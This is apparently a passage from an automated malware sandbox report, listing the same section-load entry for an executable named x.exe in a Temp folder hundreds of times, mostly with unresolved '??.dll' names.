Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
